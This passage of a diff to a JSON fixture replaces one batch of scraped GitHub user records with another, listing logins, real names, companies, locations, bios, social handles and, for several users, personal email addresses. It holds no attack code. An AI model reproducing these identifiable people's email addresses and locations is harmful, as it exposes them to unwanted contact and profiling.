"moritzsternemann", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/55756010?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3034168?v=4", "company": "", - "location": "", + "location": "Munich, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-09-24T15:46:22Z", - "updated_at": "2024-08-20T12:06:17Z", - "node_id": "MDQ6VXNlcjU1NzU2MDEw", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 40, + "followers_count": 77, + "public_gists_count": 3, + "public_repositories_count": 65, + "created_at": "2012-12-13T13:23:06Z", + "updated_at": "2024-09-04T11:21:55Z", + "node_id": "MDQ6VXNlcjMwMzQxNjg=", + "bio": "Swift, Vue.js, C++ — prev: UIKit Intern @ Apple, CS @ TUM •  WWDC Scholar / Swift Student Challenge Winner — Photography, Motion Design, Skiing\r\n", + "is_hireable": true, + "twitter_username": "strnmn" } }, { "model": "github.user", - "pk": 2202, + "pk": 7534, "fields": { - "nest_created_at": "2024-09-12T01:11:25.712Z", - "nest_updated_at": "2024-09-12T01:12:45.130Z", - "name": "Gabriel Marquet", - "login": "Gby56", + "nest_created_at": "2024-09-22T08:48:32.104Z", + "nest_updated_at": "2024-09-22T19:33:15.057Z", + "name": "Márk Sági-Kazár", + "login": "sagikazarmark", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6706472?v=4", - "company": "Escape", - "location": "Paris", + "avatar_url": "https://avatars.githubusercontent.com/u/1226384?v=4", + "company": "@openmeterio ", + "location": "Budapest, Hungary", "collaborators_count": 0, - "following_count": 172, - "followers_count": 25, - "public_gists_count": 1, - "public_repositories_count": 17, - "created_at": "2014-02-17T15:44:04Z", - "updated_at": "2024-07-01T09:45:52Z", - "node_id": "MDQ6VXNlcjY3MDY0NzI=", - "bio": "Principal Security Engineer", - "is_hireable": true, - "twitter_username": "gbysec" + "following_count": 3, + "followers_count": 1201, + "public_gists_count": 35, + "public_repositories_count": 224, + "created_at": "2011-11-28T20:36:33Z", + "updated_at": "2024-09-13T11:39:20Z", + "node_id": "MDQ6VXNlcjEyMjYzODQ=", + "bio": "Open Source enthusiast, Go & Cloud Native fan. @cncf Ambassador. Speaker, tech content creator.", + "is_hireable": false, + "twitter_username": "sagikazarmark" } }, { "model": "github.user", - "pk": 2203, + "pk": 7535, "fields": { - "nest_created_at": "2024-09-12T01:11:28.612Z", - "nest_updated_at": "2024-09-12T01:11:28.612Z", - "name": "", - "login": "0x4d4e", + "nest_created_at": "2024-09-22T08:48:32.427Z", + "nest_updated_at": "2024-09-22T19:33:15.369Z", + "name": "Naomi C. Bush", + "login": "naomicbush", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/91870?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/918242?v=4", + "company": "@gravityplus ", "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 10, - "public_gists_count": 12, - "public_repositories_count": 70, - "created_at": "2009-06-04T15:25:16Z", - "updated_at": "2024-09-02T11:20:39Z", - "node_id": "MDQ6VXNlcjkxODcw", - "bio": "", + "following_count": 41, + "followers_count": 90, + "public_gists_count": 2, + "public_repositories_count": 27, + "created_at": "2011-07-15T17:57:04Z", + "updated_at": "2024-02-06T03:10:44Z", + "node_id": "MDQ6VXNlcjkxODI0Mg==", + "bio": "Lead developer @gravityplus, helping people strategically use @gravityforms", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2204, + "pk": 7536, "fields": { - "nest_created_at": "2024-09-12T01:11:29.861Z", - "nest_updated_at": "2024-09-12T01:11:32.341Z", - "name": "Avinash", - "login": "de-adshot", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11958190?v=4", - "company": "", - "location": "Coimbatore", + "nest_created_at": "2024-09-22T08:48:32.745Z", + "nest_updated_at": "2024-09-22T19:33:15.681Z", + "name": "Nathan Fredericks", + "login": "nathanfredericks", + "email": "nathan@fredericks.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/119470878?v=4", + "company": "@Certn", + "location": "Wolfville, Nova Scotia, Canada", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, + "following_count": 15, + "followers_count": 7, + "public_gists_count": 1, "public_repositories_count": 15, - "created_at": "2015-04-15T08:35:54Z", - "updated_at": "2024-08-21T22:54:10Z", - "node_id": "MDQ6VXNlcjExOTU4MTkw", - "bio": "", + "created_at": "2022-11-30T03:26:32Z", + "updated_at": "2024-09-16T16:06:28Z", + "node_id": "U_kgDOBx77Hg", + "bio": "Computer Science Student at Acadia University\r\n@nathanfredericks-certn", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2205, + "pk": 7537, "fields": { - "nest_created_at": "2024-09-12T01:11:31.087Z", - "nest_updated_at": "2024-09-12T01:11:31.087Z", - "name": "", - "login": "rc-mattschwager", + "nest_created_at": "2024-09-22T08:48:33.064Z", + "nest_updated_at": "2024-09-22T19:33:15.993Z", + "name": "Nicholas C. Zakas", + "login": "nzakas", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/93352730?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38546?v=4", + "company": "Human Who Codes LLC", + "location": "Mountain View, CA", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 6, - "created_at": "2021-10-28T21:35:41Z", - "updated_at": "2023-10-03T15:37:31Z", - "node_id": "U_kgDOBZBzGg", - "bio": "", + "following_count": 0, + "followers_count": 10376, + "public_gists_count": 53, + "public_repositories_count": 70, + "created_at": "2008-12-05T17:18:56Z", + "updated_at": "2024-08-07T21:17:16Z", + "node_id": "MDQ6VXNlcjM4NTQ2", + "bio": "Creator of ESLint, independent software developer, consultant, coach, and author.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "slicknet" } }, { "model": "github.user", - "pk": 2206, + "pk": 7538, "fields": { - "nest_created_at": "2024-09-12T01:11:33.572Z", - "nest_updated_at": "2024-09-12T01:11:38.134Z", - "name": "Ken Dyck", - "login": "kdyck-cb", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92729718?v=4", - "company": "CloudBees", - "location": "St Catharines, Ontario, Canada", + "nest_created_at": "2024-09-22T08:48:33.416Z", + "nest_updated_at": "2024-09-22T19:33:16.307Z", + "name": "Pablo", + "login": "TheTuxis", + "email": "pablodalmasso@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1637910?v=4", + "company": "MercadoLibre", + "location": "Cordoba, Argentina", "collaborators_count": 0, - "following_count": 5, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2021-10-18T12:18:26Z", - "updated_at": "2024-04-09T18:19:15Z", - "node_id": "U_kgDOBYbxdg", - "bio": "Sr Product Security Engineer at CloudBees", + "following_count": 6, + "followers_count": 18, + "public_gists_count": 23, + "public_repositories_count": 99, + "created_at": "2012-04-12T19:15:40Z", + "updated_at": "2024-08-30T20:49:21Z", + "node_id": "MDQ6VXNlcjE2Mzc5MTA=", + "bio": "Special cases aren't special enough to break the rules.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2207, + "pk": 7539, "fields": { - "nest_created_at": "2024-09-12T01:11:34.806Z", - "nest_updated_at": "2024-09-12T01:11:34.806Z", - "name": "Ludovic Courgnaud", - "login": "X0x1RG9f", - "email": "ludovic.courgnaud@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/23699215?v=4", - "company": "Accor", - "location": "Paris", + "nest_created_at": "2024-09-22T08:48:33.768Z", + "nest_updated_at": "2024-09-22T19:33:16.616Z", + "name": "Patrick Georgi", + "login": "pgeorgi", + "email": "patrick@georgi-clan.de", + "avatar_url": "https://avatars.githubusercontent.com/u/47232?v=4", + "company": "", + "location": "Babenhausen, Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2016-11-23T11:46:01Z", - "updated_at": "2024-08-23T11:19:38Z", - "node_id": "MDQ6VXNlcjIzNjk5MjE1", - "bio": "Security, Trading & Astronomy", - "is_hireable": false, - "twitter_username": "X0x1RG9f" + "public_repositories_count": 3, + "created_at": "2009-01-17T02:15:58Z", + "updated_at": "2024-08-25T11:24:27Z", + "node_id": "MDQ6VXNlcjQ3MjMy", + "bio": "", + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 2208, + "pk": 7540, "fields": { - "nest_created_at": "2024-09-12T01:11:36.516Z", - "nest_updated_at": "2024-09-12T01:11:36.516Z", - "name": "Anubhav", - "login": "Anubhav357", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68887591?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:34.084Z", + "nest_updated_at": "2024-09-22T19:33:16.931Z", + "name": "Paul Jolly", + "login": "myitcv", + "email": "paul@myitcv.org.uk", + "avatar_url": "https://avatars.githubusercontent.com/u/3374574?v=4", + "company": "myitcv.io", + "location": "London, UK", "collaborators_count": 0, - "following_count": 7, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2020-07-28T04:35:42Z", - "updated_at": "2024-08-25T11:00:09Z", - "node_id": "MDQ6VXNlcjY4ODg3NTkx", - "bio": "", + "following_count": 34, + "followers_count": 670, + "public_gists_count": 66, + "public_repositories_count": 72, + "created_at": "2013-01-24T22:20:10Z", + "updated_at": "2024-09-06T03:35:54Z", + "node_id": "MDQ6VXNlcjMzNzQ1NzQ=", + "bio": "Gopher working on the @cue-lang project!", "is_hireable": false, - "twitter_username": "" + "twitter_username": "_myitcv" } }, { "model": "github.user", - "pk": 2209, + "pk": 7541, "fields": { - "nest_created_at": "2024-09-12T01:11:39.352Z", - "nest_updated_at": "2024-09-12T01:11:39.352Z", - "name": "", - "login": "tx-abhay", + "nest_created_at": "2024-09-22T08:48:34.394Z", + "nest_updated_at": "2024-09-22T19:33:17.237Z", + "name": "Paul Kehrer", + "login": "reaperhulk", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/100664313?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/161495?v=4", "company": "", - "location": "", + "location": "Austin", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2022-03-01T05:01:46Z", - "updated_at": "2022-08-26T08:49:47Z", - "node_id": "U_kgDOBgAD-Q", + "following_count": 3, + "followers_count": 317, + "public_gists_count": 7, + "public_repositories_count": 128, + "created_at": "2009-12-03T17:42:24Z", + "updated_at": "2024-09-21T06:26:51Z", + "node_id": "MDQ6VXNlcjE2MTQ5NQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -415478,74 +674452,74 @@ }, { "model": "github.user", - "pk": 2210, + "pk": 7542, "fields": { - "nest_created_at": "2024-09-12T01:11:40.151Z", - "nest_updated_at": "2024-09-12T01:11:40.151Z", - "name": "Yann Crumeyrolle", - "login": "ycrumeyrolle", - "email": "ycrumeyrolle@free.fr", - "avatar_url": "https://avatars.githubusercontent.com/u/1958836?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:34.712Z", + "nest_updated_at": "2024-09-22T19:33:17.557Z", + "name": "zmknox", + "login": "zmknox", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/378136?v=4", + "company": "@GannettDigital ", + "location": "VA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 12, - "public_gists_count": 0, - "public_repositories_count": 50, - "created_at": "2012-07-11T20:14:42Z", - "updated_at": "2024-09-05T11:26:29Z", - "node_id": "MDQ6VXNlcjE5NTg4MzY=", - "bio": "", + "following_count": 9, + "followers_count": 33, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2010-08-27T14:53:49Z", + "updated_at": "2024-07-23T14:52:57Z", + "node_id": "MDQ6VXNlcjM3ODEzNg==", + "bio": "☁️ and 📱", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2211, + "pk": 7543, "fields": { - "nest_created_at": "2024-09-12T01:11:41.371Z", - "nest_updated_at": "2024-09-12T01:15:15.680Z", - "name": "Valentin", - "login": "awakenine", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/28957954?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:35.034Z", + "nest_updated_at": "2024-09-22T19:33:17.915Z", + "name": "Zakir Durumeric", + "login": "zakird", + "email": "zakir@cs.stanford.edu", + "avatar_url": "https://avatars.githubusercontent.com/u/201296?v=4", + "company": "Stanford University", + "location": "Stanford, CA", "collaborators_count": 0, - "following_count": 15, - "followers_count": 3, - "public_gists_count": 6, - "public_repositories_count": 18, - "created_at": "2017-05-25T16:16:02Z", - "updated_at": "2024-09-05T08:17:19Z", - "node_id": "MDQ6VXNlcjI4OTU3OTU0", - "bio": "Valentin Leikind", + "following_count": 1, + "followers_count": 435, + "public_gists_count": 18, + "public_repositories_count": 13, + "created_at": "2010-02-10T19:49:25Z", + "updated_at": "2024-09-22T11:24:43Z", + "node_id": "MDQ6VXNlcjIwMTI5Ng==", + "bio": "🕵🏽 Security researcher. 👨🏽‍🏫 Professor, @Stanford. 🧑🏽‍💻 Founder, @Censys. 👷🏽‍♂️ Developer, @ZMap. ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2212, + "pk": 7544, "fields": { - "nest_created_at": "2024-09-12T01:11:42.602Z", - "nest_updated_at": "2024-09-12T01:11:42.602Z", - "name": "Pavel Nakonechnyi", - "login": "zOrg1331", - "email": "zorg1331@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/321938?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:35.362Z", + "nest_updated_at": "2024-09-22T19:33:18.244Z", + "name": "Zhang Yi Jiang", + "login": "ZhangYiJiang", + "email": "contact@meebleforp.com", + "avatar_url": "https://avatars.githubusercontent.com/u/445650?v=4", + "company": "Ironclad Inc.", + "location": "San Francisco, CA, USA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 10, - "public_gists_count": 3, - "public_repositories_count": 41, - "created_at": "2010-07-03T15:01:20Z", - "updated_at": "2024-08-10T14:45:10Z", - "node_id": "MDQ6VXNlcjMyMTkzOA==", + "following_count": 1, + "followers_count": 122, + "public_gists_count": 27, + "public_repositories_count": 90, + "created_at": "2010-10-19T16:17:07Z", + "updated_at": "2024-09-05T22:39:54Z", + "node_id": "MDQ6VXNlcjQ0NTY1MA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -415553,24 +674527,24 @@ }, { "model": "github.user", - "pk": 2213, + "pk": 7545, "fields": { - "nest_created_at": "2024-09-12T01:11:45.978Z", - "nest_updated_at": "2024-09-12T01:11:45.978Z", - "name": "kuldeep singh bharati", - "login": "kuldeep0508", - "email": "ksb0508@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3303034?v=4", - "company": "SOPRA BANKING SOFTWARES", - "location": "Delhi", + "nest_created_at": "2024-09-22T08:48:35.671Z", + "nest_updated_at": "2024-09-22T19:48:39.371Z", + "name": "Zou Guangxian", + "login": "zouguangxian", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/863281?v=4", + "company": "", + "location": "China", "collaborators_count": 0, - "following_count": 6, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-01-18T05:11:11Z", - "updated_at": "2024-03-14T10:16:32Z", - "node_id": "MDQ6VXNlcjMzMDMwMzQ=", + "following_count": 50, + "followers_count": 158, + "public_gists_count": 5, + "public_repositories_count": 145, + "created_at": "2011-06-21T03:32:56Z", + "updated_at": "2024-09-17T23:59:39Z", + "node_id": "MDQ6VXNlcjg2MzI4MQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -415578,49 +674552,49 @@ }, { "model": "github.user", - "pk": 2214, + "pk": 7546, "fields": { - "nest_created_at": "2024-09-12T01:11:46.829Z", - "nest_updated_at": "2024-09-12T01:11:46.829Z", - "name": "Frans Caisar Ramadhan", - "login": "franzramadhan", - "email": "me@franzramadhan.dev", - "avatar_url": "https://avatars.githubusercontent.com/u/1482172?v=4", - "company": "@franirafa ", - "location": "Jakarta", + "nest_created_at": "2024-09-22T08:48:35.989Z", + "nest_updated_at": "2024-09-22T19:33:18.865Z", + "name": "Christian Bromann", + "login": "christian-bromann", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/731337?v=4", + "company": "@ionic-team", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 69, - "followers_count": 21, - "public_gists_count": 24, - "public_repositories_count": 61, - "created_at": "2012-02-28T14:37:30Z", - "updated_at": "2024-09-03T11:23:15Z", - "node_id": "MDQ6VXNlcjE0ODIxNzI=", - "bio": "", - "is_hireable": true, - "twitter_username": "frankyramadhan" + "following_count": 34, + "followers_count": 1028, + "public_gists_count": 27, + "public_repositories_count": 230, + "created_at": "2011-04-15T11:14:02Z", + "updated_at": "2024-09-18T12:34:33Z", + "node_id": "MDQ6VXNlcjczMTMzNw==", + "bio": "Building web-components with @stencil-community at @ionic-team. Head of the @webdriverio project. Open source & open standards advocate.", + "is_hireable": false, + "twitter_username": "bromann" } }, { "model": "github.user", - "pk": 2215, + "pk": 7547, "fields": { - "nest_created_at": "2024-09-12T01:11:48.081Z", - "nest_updated_at": "2024-09-12T01:11:48.081Z", - "name": "Valery Korolyov", - "login": "fuzzah", + "nest_created_at": "2024-09-22T08:48:36.308Z", + "nest_updated_at": "2024-09-22T19:33:19.169Z", + "name": "elyesa", + "login": "ssl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60884276?v=4", - "company": "Garda Technologies", - "location": "Moscow", + "avatar_url": "https://avatars.githubusercontent.com/u/25695071?v=4", + "company": "", + "location": "the netherlands", "collaborators_count": 0, - "following_count": 8, - "followers_count": 15, + "following_count": 25, + "followers_count": 168, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2020-02-10T13:37:06Z", - "updated_at": "2024-06-09T22:22:54Z", - "node_id": "MDQ6VXNlcjYwODg0Mjc2", + "public_repositories_count": 7, + "created_at": "2017-02-10T20:13:42Z", + "updated_at": "2024-07-21T13:58:32Z", + "node_id": "MDQ6VXNlcjI1Njk1MDcx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -415628,74 +674602,74 @@ }, { "model": "github.user", - "pk": 2216, + "pk": 7548, "fields": { - "nest_created_at": "2024-09-12T01:11:48.892Z", - "nest_updated_at": "2024-09-12T01:11:48.892Z", - "name": "", - "login": "sergeymeleschenko", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/34446179?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:36.625Z", + "nest_updated_at": "2024-09-22T19:33:19.483Z", + "name": "Florian Bernd", + "login": "flobernd", + "email": "flobernd@zyantific.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8585557?v=4", + "company": "@elastic", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-12-11T12:53:25Z", - "updated_at": "2023-07-19T12:39:22Z", - "node_id": "MDQ6VXNlcjM0NDQ2MTc5", - "bio": "", + "following_count": 26, + "followers_count": 129, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2014-08-29T00:41:49Z", + "updated_at": "2024-09-13T12:19:06Z", + "node_id": "MDQ6VXNlcjg1ODU1NTc=", + "bio": "Performance focused software engineer. Creator of Zydis.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2217, + "pk": 7549, "fields": { - "nest_created_at": "2024-09-12T01:11:49.723Z", - "nest_updated_at": "2024-09-12T01:14:39.325Z", - "name": "eNI", - "login": "enidevops", + "nest_created_at": "2024-09-22T08:48:36.946Z", + "nest_updated_at": "2024-09-22T19:33:19.794Z", + "name": "", + "login": "linuxbandit", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44378292?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3695704?v=4", "company": "", - "location": "", + "location": "Sofia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-10-22T18:43:45Z", - "updated_at": "2024-07-28T08:51:37Z", - "node_id": "MDQ6VXNlcjQ0Mzc4Mjky", - "bio": "", - "is_hireable": false, + "following_count": 33, + "followers_count": 20, + "public_gists_count": 2, + "public_repositories_count": 51, + "created_at": "2013-02-25T16:33:34Z", + "updated_at": "2024-09-14T17:24:20Z", + "node_id": "MDQ6VXNlcjM2OTU3MDQ=", + "bio": "Automation Engineer", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2218, + "pk": 7550, "fields": { - "nest_created_at": "2024-09-12T01:11:50.943Z", - "nest_updated_at": "2024-09-12T01:30:33.590Z", - "name": "manuelsommer", - "login": "manuel-sommer", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47991713?v=4", + "nest_created_at": "2024-09-22T08:48:37.256Z", + "nest_updated_at": "2024-09-22T19:33:20.115Z", + "name": "jafow", + "login": "jafow", + "email": "jared.a.fowler@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6464919?v=4", "company": "", - "location": "", + "location": "Los Angeles ", "collaborators_count": 0, - "following_count": 9, - "followers_count": 11, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2019-02-25T20:12:52Z", - "updated_at": "2024-05-21T06:56:36Z", - "node_id": "MDQ6VXNlcjQ3OTkxNzEz", + "following_count": 148, + "followers_count": 54, + "public_gists_count": 37, + "public_repositories_count": 131, + "created_at": "2014-01-21T21:34:15Z", + "updated_at": "2024-08-20T17:09:00Z", + "node_id": "MDQ6VXNlcjY0NjQ5MTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -415703,74 +674677,74 @@ }, { "model": "github.user", - "pk": 2219, + "pk": 7551, "fields": { - "nest_created_at": "2024-09-12T01:11:52.179Z", - "nest_updated_at": "2024-09-12T01:11:52.179Z", - "name": "", - "login": "advidsec", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26964967?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:37.571Z", + "nest_updated_at": "2024-09-22T19:33:20.440Z", + "name": "Joshua Bezaleel Abednego", + "login": "joshuabezaleel", + "email": "joshua.bezaleel@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7043511?v=4", + "company": "GoTo Financial", + "location": "Jakarta, Indonesia", "collaborators_count": 0, - "following_count": 2, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2017-04-06T12:00:41Z", - "updated_at": "2024-05-16T11:26:21Z", - "node_id": "MDQ6VXNlcjI2OTY0OTY3", + "following_count": 16, + "followers_count": 64, + "public_gists_count": 10, + "public_repositories_count": 129, + "created_at": "2014-03-24T05:08:59Z", + "updated_at": "2024-07-28T10:28:49Z", + "node_id": "MDQ6VXNlcjcwNDM1MTE=", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "joshuabezaleel" } }, { "model": "github.user", - "pk": 2220, + "pk": 7552, "fields": { - "nest_created_at": "2024-09-12T01:11:54.688Z", - "nest_updated_at": "2024-09-12T01:11:56.002Z", - "name": "Felix Hoeborn", - "login": "fhoeborn", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/98820380?v=4", - "company": "BioNTech SE", - "location": "Germany", + "nest_created_at": "2024-09-22T08:48:37.930Z", + "nest_updated_at": "2024-09-22T19:33:20.754Z", + "name": "Julian Schiavo", + "login": "julianschiavo", + "email": "schiavo3@illinois.edu", + "avatar_url": "https://avatars.githubusercontent.com/u/19729335?v=4", + "company": "University of Illinois Urbana-Champaign", + "location": "Champaign, IL", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2022-02-01T12:50:27Z", - "updated_at": "2024-08-14T20:57:01Z", - "node_id": "U_kgDOBePhHA", - "bio": "", - "is_hireable": false, - "twitter_username": "FHoeborn" + "following_count": 17, + "followers_count": 172, + "public_gists_count": 7, + "public_repositories_count": 73, + "created_at": "2016-06-03T11:22:21Z", + "updated_at": "2024-09-21T11:33:28Z", + "node_id": "MDQ6VXNlcjE5NzI5MzM1", + "bio": "19, CS @ UIUC, Swift on Apple platforms developer, Apple WWDC 2018, 2019, 2021 Scholarship Winner, prev. intern @ Inturio & Silentmode", + "is_hireable": true, + "twitter_username": "_julianschiavo" } }, { "model": "github.user", - "pk": 2221, + "pk": 7553, "fields": { - "nest_created_at": "2024-09-12T01:11:57.269Z", - "nest_updated_at": "2024-09-12T01:11:57.269Z", + "nest_created_at": "2024-09-22T08:48:38.257Z", + "nest_updated_at": "2024-09-22T19:33:21.065Z", "name": "", - "login": "xoda", + "login": "mfahda", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5850473?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67985720?v=4", + "company": "PathCheck Foundation", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2013-11-04T12:13:49Z", - "updated_at": "2024-05-17T10:52:59Z", - "node_id": "MDQ6VXNlcjU4NTA0NzM=", + "public_repositories_count": 1, + "created_at": "2020-07-08T00:02:00Z", + "updated_at": "2020-10-05T01:38:17Z", + "node_id": "MDQ6VXNlcjY3OTg1NzIw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -415778,99 +674752,124 @@ }, { "model": "github.user", - "pk": 2222, + "pk": 7554, "fields": { - "nest_created_at": "2024-09-12T01:11:59.815Z", - "nest_updated_at": "2024-09-12T01:11:59.815Z", - "name": "ilomax", - "login": "ilomax", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24372477?v=4", - "company": "", - "location": "France.", + "nest_created_at": "2024-09-22T08:48:38.576Z", + "nest_updated_at": "2024-09-22T19:33:21.385Z", + "name": "nullpixel", + "login": "nullpixel", + "email": "jamie@nullpixel.uk", + "avatar_url": "https://avatars.githubusercontent.com/u/6704113?v=4", + "company": "@dynastic Developer", + "location": "/dev/null", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2016-12-04T15:59:48Z", - "updated_at": "2024-07-04T12:05:57Z", - "node_id": "MDQ6VXNlcjI0MzcyNDc3", - "bio": "", + "following_count": 4, + "followers_count": 409, + "public_gists_count": 13, + "public_repositories_count": 74, + "created_at": "2014-02-17T11:10:12Z", + "updated_at": "2023-06-29T00:55:36Z", + "node_id": "MDQ6VXNlcjY3MDQxMTM=", + "bio": "👋 this GitHub is around for archival purposes, my new one is at @jamiebishop.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "jamiebishop123" } }, { "model": "github.user", - "pk": 2223, + "pk": 7555, "fields": { - "nest_created_at": "2024-09-12T01:12:01.090Z", - "nest_updated_at": "2024-09-12T01:12:02.338Z", - "name": "Saher Delgado", - "login": "saheredelgadom", - "email": "saherdelgado@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/26166135?v=4", - "company": "Evolution Systems C.A.", - "location": "World", + "nest_created_at": "2024-09-22T09:34:19.156Z", + "nest_updated_at": "2024-09-22T19:33:21.692Z", + "name": "Nate Lampton", + "login": "quicksketch", + "email": "nate@quicksketch.org", + "avatar_url": "https://avatars.githubusercontent.com/u/100206?v=4", + "company": "Lullabot", + "location": "Oakland, CA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-03-03T13:27:38Z", - "updated_at": "2024-07-30T16:17:35Z", - "node_id": "MDQ6VXNlcjI2MTY2MTM1", - "bio": "Python Developer, Bash, Linux Expert and Testing Security", + "following_count": 1, + "followers_count": 134, + "public_gists_count": 17, + "public_repositories_count": 61, + "created_at": "2009-06-30T04:20:32Z", + "updated_at": "2024-08-19T02:39:02Z", + "node_id": "MDQ6VXNlcjEwMDIwNg==", + "bio": "He/Him\r\n\r\nCo-Founder of the @backdrop CMS project. Long-time @Lullabot and Drupal developer.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "quicksketch" } }, { "model": "github.user", - "pk": 2224, + "pk": 7556, "fields": { - "nest_created_at": "2024-09-12T01:12:03.574Z", - "nest_updated_at": "2024-09-12T01:12:03.574Z", - "name": "Lucas Montiel", - "login": "lcsmontiel", - "email": "lcsmontiel@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6759544?v=4", + "nest_created_at": "2024-09-22T09:34:19.474Z", + "nest_updated_at": "2024-09-22T19:33:22.019Z", + "name": "rafael", + "login": "irgolic", + "email": "hello@irgolic.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24586651?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 4, + "following_count": 5, + "followers_count": 54, "public_gists_count": 2, - "public_repositories_count": 8, - "created_at": "2014-02-22T22:34:26Z", - "updated_at": "2023-05-30T19:26:36Z", - "node_id": "MDQ6VXNlcjY3NTk1NDQ=", + "public_repositories_count": 48, + "created_at": "2016-12-15T11:00:31Z", + "updated_at": "2024-09-19T17:10:26Z", + "node_id": "MDQ6VXNlcjI0NTg2NjUx", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "IrgolicR" } }, { "model": "github.user", - "pk": 2225, + "pk": 7557, "fields": { - "nest_created_at": "2024-09-12T01:12:06.066Z", - "nest_updated_at": "2024-09-12T01:12:06.066Z", - "name": "Daniel Velardez", - 